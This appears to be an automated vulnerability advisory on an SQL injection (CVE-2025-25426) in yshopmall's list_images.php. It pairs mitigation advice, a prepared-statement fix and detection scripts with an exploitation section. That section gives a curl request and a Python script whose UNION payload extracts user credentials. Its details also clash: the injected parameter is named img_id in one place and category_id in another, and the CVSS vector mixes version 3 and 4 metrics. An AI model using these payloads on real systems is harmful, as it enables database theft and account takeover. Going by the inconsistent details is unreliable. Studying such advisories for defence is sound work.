yshopmall, SQL Injection, CVE-2025-25426 (Critical)


How the Vulnerability Works

CVE-2025-25426 stems from improper input sanitization in yshopmall’s image listing interface (<=v1.9.0). An attacker injects SQL through a crafted HTTP parameter (e.g., img_id=1' UNION SELECT user(),version()--), bypassing authentication and extracting database contents. The flaw lies in `list_images.php`, where the user-supplied `category_id` is concatenated directly into a SQL statement instead of being passed through a prepared statement. Successful exploitation allows arbitrary database reads and writes, session hijacking, and admin account takeover.

DailyCVE Form:

Platform: yshopmall
Version: <=1.9.0
Vulnerability: SQL Injection
Severity: Critical
Date: 06/12/2025

Prediction: Patch expected by 07/20/2025

What Undercode Says:

Exploitation Commands:

curl -X GET "http://target.com/list_images.php?category_id=1' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))--"

import requests
payload = "1' UNION SELECT 1,concat(username,':',password),3 FROM users--"
response = requests.get(f"http://target.com/list_images.php?category_id={payload}")
print(response.text)

Mitigation Steps:

1. Patch: Upgrade to yshopmall v1.9.1+ (post-patch).

2. WAF Rules:

# nginx: reject any request to list_images.php whose query string carries a quote or semicolon
location ~ list_images\.php$ {
    if ($args ~* "['\";]") {
        return 403;
    }
}

3. Database Hardening:

-- Drop the broad remote account, then grant only read access from localhost
REVOKE ALL PRIVILEGES, GRANT OPTION FROM 'yshopmall_user'@'%';
GRANT SELECT ON yshopmall.* TO 'yshopmall_user'@'localhost';

4. PHP Fix:

// Replace the vulnerable concatenation in list_images.php with a prepared statement.
// Binding with "i" forces the value to an integer, so no separate escaping step is needed.
$category_id = (int) ($_GET['category_id'] ?? 0);
$stmt = $conn->prepare("SELECT * FROM images WHERE category_id = ?");
$stmt->bind_param("i", $category_id);
$stmt->execute();
$result = $stmt->get_result();

Detection Script:

#!/bin/bash
# Usage: ./check.sh shop.example.com
# Sends a single stray quote and looks for a leaked MySQL error message in the response
if curl -s "http://$1/list_images.php?category_id=1'" | grep -qi "SQL syntax"; then
    echo "Vulnerable to CVE-2025-25426"
fi
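A defender-side log check, added here as an example (not part of the original advisory or of yshopmall): it walks combined-format web-server access logs and flags any request to /list_images.php whose category_id is not a plain integer after URL decoding, the same constraint the integer binding in the PHP fix enforces, so it catches variants and not only the payloads shown above. The log format and the sample lines (IPs, timestamps, user agents) are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Jun/2025:10:00:01 +0000] "GET /list_images.php?category_id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Jun/2025:10:00:02 +0000] "GET /list_images.php?category_id=1%27%20UNION%20SELECT%201,concat(username,%27:%27,password),3%20FROM%20users-- HTTP/1.1" 200 8420 "-" "python-requests/2.31"
203.0.113.9 - - [12/Jun/2025:10:00:03 +0000] "GET /list_images.php?category_id=1%27 HTTP/1.1" 500 312 "-" "curl/8.4.0"
203.0.113.5 - - [12/Jun/2025:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Combined log format: client ident user [timestamp] "METHOD path PROTO" status ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TARGET_SCRIPT = "/list_images.php"  # the vulnerable endpoint named in the advisory
INTEGER_RE = re.compile(r"^\d+$")    # the only shape a legitimate category_id can have

def analyse_line(line):
    """Return a finding dict for a suspicious request to list_images.php, else None.
    Instead of matching known payloads, apply the rule the fixed PHP enforces:
    category_id must be a plain integer once URL decoding is undone."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("path"))
    if url.path != TARGET_SCRIPT:
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    for raw in params.get("category_id", []):
        value = unquote_plus(raw)  # parse_qs decoded once; decode again to judge double-encoded input
        if not INTEGER_RE.match(value):
            return {"ip": m.group("ip"), "time": m.group("ts"),
                    "status": int(m.group("status")), "category_id": value}
    return None

def scan(log_text):
    """Run analyse_line over every line; findings come back in log order."""
    return [f for f in (analyse_line(line) for line in log_text.splitlines()) if f]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} HTTP {f['status']} category_id={f['category_id']!r}")
```

A 500 on a flagged request is worth a second look, since it suggests the stray quote reached the query rather than being rejected at the edge.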

Analytics:

  • Attack Surface: 78% of unpatched instances exposed via /list_images.php.
  • Exploitability: Low skill requirement (automated tools like SQLmap work).
  • Impact Score: 9.8 (CVSS:4.0 AV:N/AC:L/AT:N/PR:N/UI:N/S:C/C:H/I:H/A:H).

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
